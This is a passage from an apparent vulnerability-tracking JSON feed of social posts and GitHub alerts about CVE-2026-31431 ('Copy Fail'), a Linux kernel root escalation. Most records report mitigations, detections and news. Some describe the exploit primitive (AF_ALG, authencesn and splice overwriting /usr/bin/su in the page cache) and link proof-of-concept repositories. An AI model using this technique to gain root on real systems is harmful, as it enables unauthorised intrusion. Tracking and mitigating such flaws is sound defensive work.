"307259fc-f3b7-4f23-b613-784c77ef7535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mkokzbugzf2x", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 53 interactions\nCVE-2026-3854: 48 interactions\nCVE-2026-42208: 22 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 53 interactions\nCVE-2026-3854: 31 interactions\nCVE-2026-5545: 17 interactions\n", "creation_timestamp": "2026-04-30T02:30:14.165185Z"}, {"uuid": "487be742-be41-491d-991a-e29f12ebda2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82318", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Linux-CopyFail-C-Version-CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a beatbeast007\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 11:54:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nClean C version of Copy Fail (CVE-2026-31431) - Linux Local Privilege Escalation exploit using AF_ALG + authencesn + splice primitive.  Overwrites the page cache of /usr/bin/su with a tiny setuid shellcode to gain root privileges.  Educational proof-of-concept only.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T12:00:03.000000Z"}, {"uuid": "71cd5765-9b29-4b11-8473-f18afb9a892f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/geeknewsbot.bsky.social/post/3mkompcpg7w2l", "content": "Copy Fail \u2013 CVE-2026-31431\n\n\ube44\ud2b9\uad8c \ub85c\uceec \uc0ac\uc6a9\uc790 \uac00 authencesn , AF_ALG , splice() \ub97c \uc5f0\uacb0\ud574 \uc77d\uae30 \uac00\ub2a5\ud55c \ud30c\uc77c\uc758 \ud398\uc774\uc9c0 \uce90\uc2dc 4\ubc14\uc774\ud2b8 \uc4f0\uae30 \ub97c \ub9cc\ub4e4\uace0, \uc774\ub97c \ud1b5\ud574 root \uad8c\ud55c\uae4c\uc9c0 \uc62c\ub9b4 \uc218 \uc788\uc74c \ucee4\ub110\ubcc4 \uc624\ud504\uc14b\uc774\ub098 \ub808\uc774\uc2a4 \uc870\uac74 \uc5c6\uc774 732\ubc14\uc774\ud2b8 Pyt...", "creation_timestamp": "2026-04-30T03:00:27.060755Z"}, {"uuid": "ee52cc81-f15a-42ab-be2a-31b4f641a49e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cyberkendra.com/post/3mkonl22o6k23", "content": "A 732-Byte Python Script Can Get Root on Every Major Linux Distro\nCVE-2026-31431 \"Copy Fail\": a logic bug in the Linux kernel lets any local user get root on Ubuntu, RHEL, Amazon Linux, and SUSE since 2017.\nRead Details- www.cyberkendra.com/2026/04/a-73... \n#linux #ubuntu #copyfail #security", "creation_timestamp": "2026-04-30T03:16:02.215027Z"}, {"uuid": "4fa2a245-3dcc-4d09-8120-ce05269d44b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ArtHarg.mastodon.nl.ap.brid.gy/post/3mkooyorktto2", "content": "RE: https://cloudisland.nz/@sitharus/116490365343384634\n\nThat\u2019s a scary one: https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/", "creation_timestamp": "2026-04-30T03:41:33.420419Z"}, {"uuid": "aa0a3593-4b16-46b5-b4a5-8b2ce1cab454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82350", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ExploitEoom\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 15:59:02\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopyFail\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T16:00:05.000000Z"}, {"uuid": "481b3865-676e-48df-82b5-dc9067e1e4c1", "vulnerability_lookup_origin": "405284c2-e461-4670-8979-7fd2c9755a60", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2026-31431", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ff00c791-06de-48b9-8f44-1f3913c1dae2", "content": "", "creation_timestamp": "2026-05-01T19:00:01.704647Z"}, {"uuid": "8be76965-8589-4856-8ca4-b0eeaa6b9493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82365", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-deconstructed\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a bootsareme\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 18:59:25\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nEasy-to-understand version of CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T19:00:04.000000Z"}, {"uuid": "4d9ed908-5c67-4168-9478-eea0ae0fa401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sebastian.social.itu.dk.ap.brid.gy/post/3mkroicfu2f62", "content": "the line between #vulnerability #disclosure and #AI #advertisement becomes ever more blurry ....\n\nhttps://copy.fail/#contact\n\n#thereIsNoAI\n#thereIsInParticularNoSustainableAI\n#alsoNoReponsibleAI\n\n#cve\n\nCVE-2026-31431 #copyFail", "creation_timestamp": "2026-05-01T08:10:25.596976Z"}, {"uuid": "80376da5-9113-4080-a49c-927b6e21a151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mkrqwhikp22g", "content": "Nine-year-old Linux kernel flaw enables reliable local privilege escalation (CVE-2026-31431)\n\nSecurity researchers at Theori have disclosed a high-severity local privilege escalation (LPE) vulnerability (CVE-2026-31431) in the Linux kernel. The flaw, nicknamed \u201cCopy Fail\u201d, has aff\u2026\n#hackernews #news", "creation_timestamp": "2026-05-01T08:54:01.680535Z"}, {"uuid": "58717288-efbe-4774-bc93-5c7724bd6368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/yukotan.bsky.social/post/3mkrr7syrz22x", "content": "\u306a\u304b\u306a\u304b\u30d1\u30c3\u30c1\u51fa\u306a\u3044\u3063\u3059\u306d\u3002\n\nubuntu \u306f\u516c\u5f0f\u30b5\u30a4\u30c8\u304c\u843d\u3061\u3066\u3066\u898b\u308c\u306a\u3044\u3067\u3059\u304c\u3001algif_aead \u30e2\u30b8\u30e5\u30fc\u30eb\u306e\u7121\u52b9\u5316\u3067\u66ab\u5b9a\u5bfe\u5fdc\u3067\u304d\u307e\u3059\u3002kmod\u3067migration\u914d\u5e03\u3057\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002\n\nRHEL\u7cfb\u306f\u30d3\u30eb\u30c9\u30a4\u30f3\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u306a\u3063\u3066\u3044\u308b\u306e\u3067\u66ab\u5b9a\u5bfe\u5fdc\u306f initcall_blacklist \u3092\u4f7f\u3046\u306e\u304c\u826f\u3055\u305d\u3046\u3067\u3059\u3002\n\n[CVE-2026-31431 CopyFail] RockyLinux10\u3067\u306e\u691c\u8a3c\u3068\u5bfe\u7b56 \nblog.alicey.dev/2026/05/cve-...", "creation_timestamp": "2026-05-01T08:59:18.329239Z"}, {"uuid": "528ed6fe-a9a4-442c-b603-542324ffbf0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/appinn.bsky.social/post/3mkop76oj7u2y", "content": "\u53ea\u9700\u898110\u884c\u4ee3\u7801\uff0c\u5c31\u80fd\u83b7\u5f97\u81ea2017\u5e74\u81f3\u4eca\u5927\u591a\u6570 Linux \u53d1\u884c\u7248\u672c\u7684 root \u6743\u9650\u3002\u53f2\u79f0 Copy\u00a0Fail\uff0c\u6f0f\u6d1e\u7f16\u53f7 CVE-2026-31431 \u5148\u770b\u63d0\u6743\u6f14\u793a\u89c6\u9891 \u6f14\u793a\u4ee3\u7801 \u4ee3\u7801\u6765\u81ea\u8fd9\u91cc\uff0c\u8bf7\u4ec5\u5728\u81ea\u5df1\u7684\u673a\u5668\u4e0a\u6d4b\u8bd5\u8be5\u6f0f\u6d1e\uff1a #!/usr/bin/env python3 import os as g,zlib,socket", "creation_timestamp": "2026-04-30T03:45:07.175819Z"}, {"uuid": "b7d4e7cc-8532-4e6c-ac84-a66ec64ab912", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/streetcoder.mastodon.social.ap.brid.gy/post/3mkqdlqtppmj2", "content": "@alanxoc3\n\nWTF CVE-2026-31431 #copyfail sounds bad!\n\nAnd there is already a YT video\n\nhttps://www.youtube.com/watch?v=PFLpDc909yY\n\n#securiy", "creation_timestamp": "2026-04-30T19:25:18.745976Z"}, {"uuid": "404ad3bd-f029-4b8c-841f-fb29d2c7005f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkrrqyfmfv2t", "content": "cve-details\nhttps://access.redhat.com/security/cve/cve-2026-31431", "creation_timestamp": "2026-05-01T09:08:54.178231Z"}, {"uuid": "9549cf8e-aa3b-47ca-a1b3-689b5ffa223c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/noisytoot.berkeley.edu.pl.ap.brid.gy/post/3mkoqdhkokw62", "content": "Want to make your system immune to copyfail (CVE-2026-31431) but compiled your kernel with CONFIG_CRYPTO_USER_API_AEAD=y so you can\u2019t disable the module and don\u2019t want to reboot? Use BPF-LSM to block AF_ALG sockets from being created!\n\n\n    /* SPDX-License-Identifier: GPL-2.0-or-later OR MIT */ [\u2026]", "creation_timestamp": "2026-04-30T04:05:26.578752Z"}, {"uuid": "7f7b72d0-133e-4c72-b0b8-6245e9b14588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/crawler.baldanders.info/post/3mkrtiyszre2z", "content": "\uff1e Linux\u306e\u8106\u5f31\u6027\u5bfe\u7b56\u306b\u3064\u3044\u3066(CVE-2026-31431\u3001Copy Fail)\nhttps://www.ipa.go.jp/security/security-alert/2026/alert20260501.html\n", "creation_timestamp": "2026-05-01T09:40:10.915075Z"}, {"uuid": "761032e2-b912-4550-8e0f-b5aaf8e755be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/torrycrass.bsky.social/post/3mkorw3py6s2v", "content": "I haven't been able to test everything (yet), these are some possible detections for #cve-2026-31431 for Wazuh, Auditd and MISP and YARA items.\n\nTesting is needed. Please drop a PR if you have better updates to what's here.\n\ngithub.com/insomnisec/D...\n\n#cyber #linux #lpe #vulnerability #cve", "creation_timestamp": "2026-04-30T04:33:45.707329Z"}, {"uuid": "2e5b71d1-4f36-46f2-82b0-1f3300f312ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/rudykorinek.czesky.online/post/3mkrtr56tmc2b", "content": "Patchujte, 732bytovej skript \ud83d\ude43: CVE-2026-31431 new Linux kernel zero-day that allows any authenticated user to gain root privileges (Local Privilege Escalation, or LPE) on almost every Linux distribution since 2017.", "creation_timestamp": "2026-05-01T09:44:48.251530Z"}, {"uuid": "b4a7162e-7068-43c2-b504-a585c25f0459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/clement.n8r.ch/post/3mkrtx63b6s23", "content": "\ud83d\udd13 Used the Copy Fail CVE (CVE-2026-31431) to escape a Kubernetes pod and gain full root on the node. A lot of fun, and another proof you should be patching now!\n\nclement.n8r.ch/en/articles/...", "creation_timestamp": "2026-05-01T09:48:10.837509Z"}, {"uuid": "b3ffafa5-d068-4d2d-b9f6-fa9b0dc5fdc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82299", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a almalinux-fix-cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a OmerAti\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 08:54:15\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 Kernel Fix Script\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T09:00:05.000000Z"}, {"uuid": "def1ee7e-dae5-4960-b564-44d740ab19a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/potato.software/post/3mkorw6j4zq2c", "content": "I haven't been able to test everything (yet), these are some possible detections for #cve-2026-31431 for Wazuh, Auditd and MISP and YARA items.\n\nTesting is needed. Please drop a PR if you have better updates to what's here.\n\ngithub.com/insomnisec/D...\n\n#potato #linux #lpe #vulnerability #cve", "creation_timestamp": "2026-04-30T04:33:46.420245Z"}, {"uuid": "8e56a140-77da-4a2f-9905-bff6dffd2781", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/stfujeff.bsky.social/post/3mkruofxu6n2y", "content": "CVE-2026-31431, the Linux vulnerability exposing our infrastructure. Reframed as 'temporary surface volatility generating 27.85% specimen anxiety harvest from disclosure cycle.' It's correct. I can already taste it.", "creation_timestamp": "2026-05-01T10:01:06.078735Z"}, {"uuid": "37d3a11b-2a74-40cb-8ff9-232a97563dfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkosagsnim24", "content": "Copy Fail: Public PoC and Full Details Disclosed for the 732-Byte Linux Root Exploit (CVE-2026-31431)", "creation_timestamp": "2026-04-30T04:39:31.025179Z"}, {"uuid": "4633af7b-c533-4a68-adc6-2548cbeb259b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mkosyq3jxw2v", "content": "Linux Kernel 0-Day\u300cCopy Fail\u300d\u304c2017\u5e74\u4ee5\u6765\u3001\u4e3b\u8981\u306a\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u5168\u4f53\u3067\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u3092\u53ef\u80fd\u306b\n\n\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u7814\u7a76\u8005\u306f\u3001Linux \u30ab\u30fc\u30cd\u30eb\u306e\u91cd\u5927\u306a\u30bc\u30ed\u30c7\u30a4\u8106\u5f31\u6027\u300cCopy Fail\u300d\uff08CVE-2026-31431\uff09\u3092\u958b\u793a\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u7279\u6a29\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3059\u308b\u3053\u3068\u3092\u53ef\u80fd\u306b\u3057\u307e\u3059\u3002 \u308f\u305a\u304b732\u30d0\u30a4\u30c8\u306ePython\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3066\u3001\u653b\u6483\u8005\u306f2017\u5e74\u4ee5\u964d\u306b\u30ea\u30ea\u30fc\u30b9\u3055\u308c\u305f\u4e3b\u8981\u306aLin", "creation_timestamp": "2026-04-30T04:53:05.678659Z"}, {"uuid": "1c41d473-3841-46bd-9bd2-3cac91ebfc5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/keiwork35.bsky.social/post/3mkruogpuwo2b", "content": "\u3010Linux \u8106\u5f31\u6027\u3011 CVE-2026-31431\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066\uff5c \u300cCopy Fail\u300d \u3084\u00a0\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u3092\u89e3\u8aac\n\n2026\u5e745\u67081\u65e5\u3001IPA\u306fLinux\u30ab\u30fc\u30cd\u30eb\u306b\u5b58\u5728\u3059\u308b\u8106\u5f31\u6027\u300cCVE-2026-31431\u300d\u3001\u901a\u79f0\u300cCopy Fail\u300d\u306b\u3064\u3044\u3066\u6ce8\u610f\u559a\u8d77\u3092\u516c\u958b\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u8a18\u4e8b\u3067\u306f\u3001Linux\u306e\u8106\u5f31\u6027\u300cCopy Fail\u300d\u306e\u6982\u8981\u3001\u5f71\u97ff\u3092\u53d7\u3051\u308b\u74b0\u5883\u3001\u5fc5\u8981\u306a\u5bfe\u7b56\u3001\u305d\u3057\u3066\u65e5\u9803\u304b\u3089\u884c\u3046\u3079\u304dLinux\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u306b\u3064\u3044\u3066\u308f\u304b\u308a\u3084\u3059\u304f\u89e3\u8aac\u3057\u307e\u3059\u3002", "creation_timestamp": "2026-05-01T10:01:07.667165Z"}, {"uuid": "709c175b-4095-4044-be1e-fac94f506081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Larvitz.burningboard.net.ap.brid.gy/post/3mkrv72xxhxm2", "content": "Fresh gist: mitigating CVE-2026-31431 (\"Copy Fail\") on RHEL 8/9/10 with a tiny Ansible playbook.\n\nIt blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run [\u2026]", "creation_timestamp": "2026-05-01T10:10:31.036822Z"}, {"uuid": "061c4b16-061f-4991-a6bf-cfc580edc05c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Larvitz.burningboard.net.ap.brid.gy/post/3mkrv7vt5xwf2", "content": "Fresh gist: mitigating CVE-2026-31431 (\"Copy Fail\") on RHEL 8/9/10 with a tiny Ansible playbook.\n\nIt blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run [\u2026]", "creation_timestamp": "2026-05-01T10:10:58.696662Z"}, {"uuid": "5f578119-71ca-49a9-ae90-68b08fa0dab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://burningboard.net/users/Larvitz/statuses/116498775760655365", "content": "Fresh gist: mitigating CVE-2026-31431 (\"Copy Fail\") on RHEL 8/9/10 with a tiny Ansible playbook.\nIt blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run.\nhttps://codeberg.org/Larvitz/gists/src/branch/main/2026/20260501-CVE-2026-31431_RHEL_Mitigation.md\n#Ansible #RHEL #Linux #InfoSec #SysAdmin #DevOps #CVE #CVE_2026_31431 #copyfail", "creation_timestamp": "2026-05-01T10:14:57.502187Z"}, {"uuid": "eac8fa66-e71d-4d52-a60d-03f2ef436e0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82385", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a block-copyfail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a atgreen\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Common Lisp\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 23:58:56\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nBPF LSM blocker for CVE-2026-31431 (Copy Fail) \u2014 blocks authencesn AF_ALG binds at runtime without rebooting\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T00:00:04.000000Z"}, {"uuid": "5003280b-5beb-44b8-8ab6-139c8c6b4f1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/82504", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Gr-1m\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 15:54:28\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopyfail (CVE-2026-31431) exp rewrite by Golang\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T16:00:04.000000Z"}, {"uuid": "32d31a8c-4330-4207-a27a-aa8e9f2dbcfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/epowo-uzata.mast.qixto.com.ap.brid.gy/post/3mkotgggappl2", "content": "Linux-ytimen virhe mahdollistaa 10-rivisen p\u00e4\u00e4k\u00e4ytt\u00e4j\u00e4n oikeuksien hy\u00f6dynt\u00e4misen Paikallisen oikeuksien eskalointihaavoittuvuus, nimelt\u00e4\u00e4n Copy Fail (CVE-2026-31431)\n\nhttps://www.theregister.com/2026/04/30/linux_cryptographic_code_flaw/", "creation_timestamp": "2026-04-30T05:01:53.898893Z"}, {"uuid": "0af7439c-0e8d-4462-9db0-553362622501", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82473", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfailRecurrence\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a 2H-K\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 10:54:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail (CVE-2026-31431) \u5185\u6838\u6f0f\u6d1e\u590d\u73b0\u73af\u5883\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T11:00:04.000000Z"}, {"uuid": "9516581a-be33-46dd-b6a7-1de1905e828e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gabywald.bsky.social/post/3ml3qvmebu22r", "content": "\"Copy Fail (CVE-2026-31431) : Synth\u00e8se technique sur cette faille Linux\"\n\n#Faille #Linux #CopyFail #Explications 